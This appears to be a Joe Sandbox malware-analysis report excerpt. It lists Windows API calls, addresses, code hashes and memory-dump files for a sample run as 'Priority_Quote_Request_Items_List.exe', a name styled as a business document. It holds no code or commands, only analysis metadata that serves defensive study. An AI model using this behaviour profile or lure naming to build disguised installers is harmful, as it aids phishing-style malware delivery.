                                                      • Instruction ID: 619afea56069f31c127a8e11fd0f1f435edbd74989573f139d652fd0604b037d
                                                      • Opcode Fuzzy Hash: dddba1b7fb40dfba2eebb52e979470bab8911acb43c099432c1d6ae5efd7ed55
                                                      • Instruction Fuzzy Hash: 8AF0AF32A04100ABEB10BFB48A4EABE72699B80314F14843BF501B71D1C9FC9D025629
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 0040525C
                                                        • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                      • CoUninitialize.COMBASE(00000404,00000000), ref: 004052A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: InitializeMessageSendUninitialize
                                                      • String ID:
                                                      • API String ID: 2896919175-0
                                                      • Opcode ID: e510a8554f72ac42c1e77e5b880e55181332485b1ec9c5f6942f04f593ee2aa3
                                                      • Instruction ID: d190f16cb00a78a8791a8665c172551021538f6a88e76c08847af4d92639a026
                                                      • Opcode Fuzzy Hash: e510a8554f72ac42c1e77e5b880e55181332485b1ec9c5f6942f04f593ee2aa3
                                                      • Instruction Fuzzy Hash: 99F0F072A05600EBDB209B54AD01B5773A4EFD4301F0548BEFE44B72A1E7788C028E6D
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                        • Part of subcall function 00406384: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                        • Part of subcall function 00406384: wsprintfW.USER32 ref: 004063D6
                                                        • Part of subcall function 00406384: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063EA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                      • String ID:
                                                      • API String ID: 2547128583-0
                                                      • Opcode ID: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                      • Instruction ID: 5dc38b7c1614d08ea85e9237aecc352f838a6b2874e2c17184f6d3a6923fef4e
                                                      • Opcode Fuzzy Hash: a18958032a131606469e198625683324ecaa140be52d037ed0b096a6b0eca255
                                                      • Instruction Fuzzy Hash: 02E086326081225BD31157715D4497776A8AA9D640306043EFD06F61C1D774AC219AAD
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00405BF3
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00405C15
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                      • Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
                                                      • Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                      • Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,004057CF,?,?,00000000,004059A5,?,?,?,?), ref: 00405BCF
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BE3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 12e66bcdd04e2879fdb80b2c332070aab0449f7c07d3bd30d589cafb4efe0379
                                                      • Instruction ID: fe509d3f362e3f7859bf4bbc37f15f2155ec7d75e112c9803890ba7330917acd
                                                      • Opcode Fuzzy Hash: 12e66bcdd04e2879fdb80b2c332070aab0449f7c07d3bd30d589cafb4efe0379
                                                      • Instruction Fuzzy Hash: A6D01272908121AFC2102738EE0C89FBFA5EB543717054B31F979A22F0C7305C52CA95
                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004056CB
                                                      • GetLastError.KERNEL32 ref: 004056D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                      • Instruction ID: fb2ec3850198e6a3c32e9ec6a0d6f7e4a8645a4513041e6eac74538e2b64e397
                                                      • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                      • Instruction Fuzzy Hash: 51C04C30A18642DBD6505B20ED087177950AB50741F60CD35610BF11A0D6759811DD3E
                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                      • Instruction ID: ef4ecac980915e2f81eec60b371ea7b66f7146230b2cbae24b16510ac7dd1765
                                                      • Opcode Fuzzy Hash: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                      • Instruction Fuzzy Hash: 53E0EC3265835AABEF109E659C08AEB7B6CEB05360F004432F915E6190D271E8219BA5
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                      • Instruction ID: 2fd216668262c1d23633d06d3759517c993b1d1f21998de780648112abb91376
                                                      • Opcode Fuzzy Hash: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                      • Instruction Fuzzy Hash: 64E08676244108BFDB00DFA4DD47FD577ECEB44700F004421BA08D7091C774E5408768
                                                      APIs
                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,00000004,00000000), ref: 00405CB5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                      • Instruction ID: ba43a9b4bceeecaa6f2f3e0d34fbf098cac3b3b9582c4b6c2afca3054f4c0e18
                                                      • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                      • Instruction Fuzzy Hash: 53E08632114319ABDF105E509C40EEB3B6CEB00350F004432F915E3180D231F8219BA4
                                                      APIs
                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                      • Instruction ID: 41fb3c375bc4c6d8b97388dc18782044d705989845ec456808571e00864cea1f
                                                      • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                      • Instruction Fuzzy Hash: 76C09B717443017BDA308F509D49F1777556794B40F54C8797700F60D0C674E451D61D
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,00000001,00403F3F), ref: 00404121
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                      • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                      • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                      • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00403230
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                      • Instruction ID: 0576ba63ef0ea8b46fce932fbf196e130763cebcf3e43c4cce3b0366b0281484
                                                      • Opcode Fuzzy Hash: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                      • Instruction Fuzzy Hash: 64B01231584200BFDB214F00DE05F057B21A790700F10C030B304780F082712460EB0D
                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                      • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                      • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                      • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                      • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                                      • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                                      • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                      • GlobalFree.KERNEL32(?), ref: 00404F25
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405076
                                                      • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                      • ShowWindow.USER32(00000000), ref: 004050D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
